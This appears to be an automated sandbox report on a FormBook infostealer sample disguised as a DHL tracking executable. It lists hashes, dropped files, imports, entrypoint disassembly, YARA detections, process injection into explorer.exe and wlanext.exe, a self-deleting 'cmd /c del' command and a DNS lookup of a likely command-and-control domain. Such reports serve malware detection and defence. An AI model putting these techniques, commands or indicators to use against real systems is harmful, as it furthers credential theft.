                  SHA-512:9246B31146551D240878F47592074E9C26F022B4ADDF89FE11B1CD4F1AF30EE991C0E8D42FA5B7C610C748553B7D52626105C7BD56EF7E01BD9B33B717270156
                  Malicious:false
                  Reputation:low
                  Preview:.<...2.HW-L.A..w. ."...1p..1...B4a.U....l.ev.............W.Z...X1...m.$....^E.8..6.Wa9..1fxN$.0.a.X.|`..F...Kb..T.H^..8tf&..8...7&:br.....Y....aG...M.N;.P?`..j.R9Q.>....?...Wv...=~%D6.k.*6c..\.~pu.~......d.Y...^.*pj..4S.`.MJ....a......b...@..."S .2.t.Z....#....3.*...O.*aU..4a.U...P..;.ev...m.........W...o)X.Z....^..3+4.^..5.]..B.6(.9.#.......h!p..^..C..[^..8tf....5Iu]..6..5.>.......a..X1/F.;(v..k.yW..h..n...?...0%..=~%..k..cB._.~4u.~...p.2...v.....pj..4S.`.5n....aC.....b...@...T". .2.H......#...3[*...O..a...B4a.U....l.ev.............W...o)X.Z....^..3+4.^..5.]..B.6(.9.#.......h!p..^..C..[^..8tf....5Iu]..6..5.>.......a..X1/F.;(v..k.yW..h..n...?...Wv...=~%A~.k.,.cB.4.~pu.~...p.2...v....*pj..4S.`.5n....aC.....b...@...T". .2.H......#...3[*...O..a...B4a.U....l.ev.............W...o)X.Z....^..3+4.^..5.]..B.6(.9.#.......h!p..^..C..[^..8tf....5Iu]..6..5.>.......a..X1/F.;(v..k.yW..h..n...?...Wv...=~%A~.k.,.cB.4.~pu.~...p.2...v....*pj..4S.`

                  C:\Users\user\AppData\Local\Temp\nsr8F1A.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):268956
                  Entropy (8bit):7.643688780936791
                  Encrypted:false
                  SSDEEP:6144:u57Bqt/rlMOOtvd7vIeYMD0dNT+V/w1Vc5i:yqt/rlMOURXYMAdl+VI1w
                  MD5:5671EF7FB29C27877E71184714A1C0F6
                  SHA1:3CE9961EC8B7F820E58AF0EA56ABEA8DB18F2E1C
                  SHA-256:D3DA5949B1EA253A18E0B684EC6EE1B355E9FA0C3B81C847119602D6AFBE459A
                  SHA-512:6C835BFAAA83F01BF276BA42ADDDC8AE3C6F0C43C059A6AA713F5D382E8FC5115A09FEDD98F29A95FA7615CF15CD58475ED1DC321F410CECC4B38EDA5D2544F3
                  Malicious:false
                  Reputation:low
                  Preview:]q......,........................U......wp......Eq..............................................................k...........................................................................................................................................................................J...............k...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll

                  Download File
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):17920
                  Entropy (8bit):5.732490075773449
                  Encrypted:false
                  SSDEEP:384:45EhhSL3A0xOfQy1zCsF0oavew2PFVP6zx22Y0We4omL/:4+hSLwWOIy1Wtoa2wNQo
                  MD5:D2B96D84DF88876D02820CA05C8254E2
                  SHA1:66C575874197ACE26E2D77C408154891C1C2A464
                  SHA-256:AC4F4FC273432D090B87CC740B2668BB105AEA12D35B9F48BE82885607172708
                  SHA-512:123B2255F5598BC7D51872CB2E0CBA58367B22AD638DF786AAEFA4CFDDDA11A0DAEC36002559CD9A2BDCD74CC78F903642595E0438FDD82681A938B9CB1B97F1
                  Malicious:true
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 37%, Browse
                  • Antivirus: ReversingLabs, Detection: 26%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L..O-.EO-.EO-.E[F.D@-.EO-.EU-.E.s.DN-.E.s.DN-.E.s.EN-.E.s.DN-.ERichO-.E........PE..L......a...........!.....8...................P............................................@..........................P..H....P.......`.......................p..D....................................................P...............................text....7.......8.................. ..`.rdata..L....P.......<..............@..@.rsrc........`.......B..............@..@.reloc..D....p.......D..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\yblhciuwz

                  Download File
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5254
                  Entropy (8bit):6.083971719042361
                  Encrypted:false
                  SSDEEP:96:0MhH9rpQHfV685JLXeDCjxxB6qoX+hmKQuKFvIVyOF7SCWO2z5lOfdHM+KQ0yBdq:0Gw6YL3xxItn62z3wHM0fwvT
                  MD5:CF29025B5A29863F95888CC5EAE59F80
                  SHA1:707E98B72D945FBB32D5A9CA282FF74A117FF648
                  SHA-256:C7333C69C05C4BF3D325ADA4EFBB8F1641108B21211BA729F90DA95923867955
                  SHA-512:DB5E6E866077CB8DC597BF2E033A2DE3D46DDAFD0E82E2956E2840A757902F66A36A87830214E6D77668BF53F53FF08AAD62A7234AD84E5148B30BB7969BA45F
                  Malicious:false
                  Reputation:low
                  Preview:@?nWW..C.C......GWf...fz.7f...fz.O.._W..S.WWW..[WV.cV.g._.OTWWW.?.3V.cV.g._.OOWWW.'.;V.cV.g._.O:WWW./.#V.cV.g._.O.WWW...+..gk..o...jj.c..7.K.g.Ok. .O.C.O.S.k(.9.g.^X.Oj.S.k).S....[.KG..OWWWW.k.l"..SV.?.V.'.V./..V....V.7.V.O..].g..c^..[w.Eh.GV.?...ofl.Gj.SOWWWW...k.WWW.k.d"..[...G....L.)cW..C..f...fz._.o.W..c.w.o.W.g.{(._.(k.S.o.W..o.h._.S.L.)cW.}Q-.O.iWWO.iWW){W..V6.O.iWWO.iWW)oW.d...O.iWWO.iWW)oW..C.C.f...fz.O.._gWWW.?.S.._W.}.S-WW.S..S._.._BKO{lWW....o..o.. W.d?.d3.O..o.(HW.d?.d3.i.o...W.l?...V6.O8hWW.O%TVV.[Bf.O.V.oO.VVV.[..[W.m..GWBn..GhWWW.G.L.)kW..C.C.f...fz.O.._.WWW...S.._W.}.S-WW.S..S._.._BKO.kWW..f..WWW.o..o.. W.d..d+.c..o.(HW.d..d+.g..o.8H.d..d+.{. .o..9j.|..|+.O..o.(Hi.d..d+.l.o...W.l...}Q-.OMWWW.OJSVV.[...W.o.O...hB~V..V.{V.gV.cV.oO.UVV.[..[W.m..GWBn..GhWWW.G.L.){W..C.Cs.._gWWW.K.S.._W.}.S-WW.S..S._.._BKO.jWW....o..o.. W.dK.dO.c..o.(HW.dK.dO.i.o...W.lK..d...O.WWW.O.SVV.[BeV.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929574935862176
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:DHL AWB TRACKING DETAILS.exe
                  File size:254216
                  MD5:4e358b432ba956c13627beee054d68e5
                  SHA1:8791318da047e93f2a16cc6535eba5159228f832
                  SHA256:836696cddebff5d522acb2c105a404ceeb635df69b3c9544b5bebcef13bc3e86
                  SHA512:a251f2f3e4fe9b0b44b3537983b406e9eb2d5e22298129ba9548f626c3657410adf23b50d0dd69f4601d7c873056e545ca7be0d808f8f0db3f9a38609b82dcff
                  SSDEEP:6144:ownv8jZAg8ZjqsPExIRaX+kK9WPvCH+tIvz:D8jZUVRaukK9kvCH+aL
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x403225
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:099c0646ea7282d232219f8807883be0

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409128h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B4h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [00423F58h], eax
                  call 00007F42389B1E60h
                  mov dword ptr [00423EA4h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 0041F450h
                  call dword ptr [00407158h]
                  push 004091B0h
                  push 004236A0h
                  call 00007F42389B1B17h
                  call dword ptr [004070B0h]
                  mov edi, 00429000h
                  push eax
                  push edi
                  call 00007F42389B1B05h
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00429000h], 00000022h
                  mov dword ptr [00423EA0h], eax
                  mov eax, edi
                  jne 00007F42389AF32Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00429001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007F42389B15F8h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007F42389AF385h
                  cmp cl, 00000020h
                  jne 00007F42389AF328h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007F42389AF31Ch
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x2c1900x2e8dataEnglishUnited States
                  RT_DIALOG0x2c4780x100dataEnglishUnited States
                  RT_DIALOG0x2c5780x11cdataEnglishUnited States
                  RT_DIALOG0x2c6980x60dataEnglishUnited States
                  RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                  RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 28, 2022 10:56:53.209121943 CET5498253192.168.2.68.8.8.8
                  Jan 28, 2022 10:56:53.241837978 CET53549828.8.8.8192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 28, 2022 10:56:53.209121943 CET192.168.2.68.8.8.80x775bStandard query (0)www.chinaanalysisgroup.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 28, 2022 10:56:53.241837978 CET8.8.8.8192.168.2.60x775bNo error (0)www.chinaanalysisgroup.com94.136.40.51A (IP address)IN (0x0001)

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:10:54:31
                  Start date:28/01/2022
                  Path:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x400000
                  File size:254216 bytes
                  MD5 hash:4E358B432BA956C13627BEEE054D68E5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Target ID:1
                  Start time:10:54:33
                  Start date:28/01/2022
                  Path:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x400000
                  File size:254216 bytes
                  MD5 hash:4E358B432BA956C13627BEEE054D68E5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Target ID:4
                  Start time:10:54:38
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Target ID:11
                  Start time:10:55:07
                  Start date:28/01/2022
                  Path:C:\Windows\SysWOW64\wlanext.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                  Imagebase:0xfa0000
                  File size:78848 bytes
                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Target ID:12
                  Start time:10:55:13
                  Start date:28/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:13
                  Start time:10:55:14
                  Start date:28/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:20
                  Start time:10:55:43
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                  Imagebase:0x7ff7ebed0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:31
                  Start time:10:56:35
                  Start date:28/01/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:19.5%
                    Dynamic/Decrypted Code Coverage:6.8%
                    Signature Coverage:22.7%
                    Total number of Nodes:1343
                    Total number of Limit Nodes:33
                    execution_graph 4638 401cc1 GetDlgItem GetClientRect 4639 4029e8 18 API calls 4638->4639 4640 401cf1 LoadImageA SendMessageA 4639->4640 4641 40287d 4640->4641 4642 401d0f DeleteObject 4640->4642 4642->4641 4643 401dc1 4644 4029e8 18 API calls 4643->4644 4645 401dc7 4644->4645 4646 4029e8 18 API calls 4645->4646 4647 401dd0 4646->4647 4648 4029e8 18 API calls 4647->4648 4649 401dd9 4648->4649 4650 4029e8 18 API calls 4649->4650 4651 401de2 4650->4651 4652 401423 25 API calls 4651->4652 4653 401de9 ShellExecuteA 4652->4653 4654 401e16 4653->4654 4655 401ec5 4656 4029e8 18 API calls 4655->4656 4657 401ecc GetFileVersionInfoSizeA 4656->4657 4658 401eef GlobalAlloc 4657->4658 4659 401f45 4657->4659 4658->4659 4660 401f03 GetFileVersionInfoA 4658->4660 4660->4659 4661 401f14 VerQueryValueA 4660->4661 4661->4659 4662 401f2d 4661->4662 4666 4059e3 wsprintfA 4662->4666 4664 401f39 4667 4059e3 wsprintfA 4664->4667 4666->4664 4667->4659 4668 4014ca 4669 404e23 25 API calls 4668->4669 4670 4014d1 4669->4670 4027 403f4b lstrcpynA lstrlenA 4028 40604c 4034 405ed0 4028->4034 4029 40683b 4030 405f51 GlobalFree 4031 405f5a GlobalAlloc 4030->4031 4031->4029 4031->4034 4032 405fd1 GlobalAlloc 4032->4029 4032->4034 4033 405fc8 GlobalFree 4033->4032 4034->4029 4034->4030 4034->4031 4034->4032 4034->4033 3358 401f51 3359 401f63 3358->3359 3360 402004 3358->3360 3379 4029e8 3359->3379 3363 401423 25 API calls 3360->3363 3368 40215b 3363->3368 3364 4029e8 18 API calls 3365 401f73 3364->3365 3366 401f88 LoadLibraryExA 3365->3366 3367 401f7b GetModuleHandleA 3365->3367 3366->3360 3369 401f98 GetProcAddress 3366->3369 3367->3366 3367->3369 3370 401fe5 3369->3370 3371 401fa8 3369->3371 3393 404e23 3370->3393 3373 401fb0 3371->3373 3374 401fc7 3371->3374 3390 401423 3373->3390 3385 735f1000 GetTempPathW 3374->3385 3376 401fb8 3376->3368 3377 401ff8 FreeLibrary 3376->3377 3377->3368 3380 4029f4 3379->3380 3404 405aa7 3380->3404 3383 401f6a 3383->3364 3444 735f473e 3385->3444 3387 735f1073 CreateFileW GetFileSize VirtualAlloc ReadFile 3388 735f10c6 3387->3388 3389 735f10d5 EnumResourceTypesW 3387->3389 3388->3388 3388->3389 3391 404e23 25 API calls 3390->3391 3392 401431 3391->3392 3392->3376 3394 404e3e 3393->3394 3402 404ee1 3393->3402 3395 404e5b lstrlenA 3394->3395 3396 405aa7 18 API calls 3394->3396 3397 404e84 3395->3397 3398 404e69 lstrlenA 3395->3398 3396->3395 3400 404e97 3397->3400 3401 404e8a SetWindowTextA 3397->3401 3399 404e7b lstrcatA 3398->3399 3398->3402 3399->3397 3400->3402 3403 404e9d SendMessageA SendMessageA SendMessageA 3400->3403 3401->3400 3402->3376 3403->3402 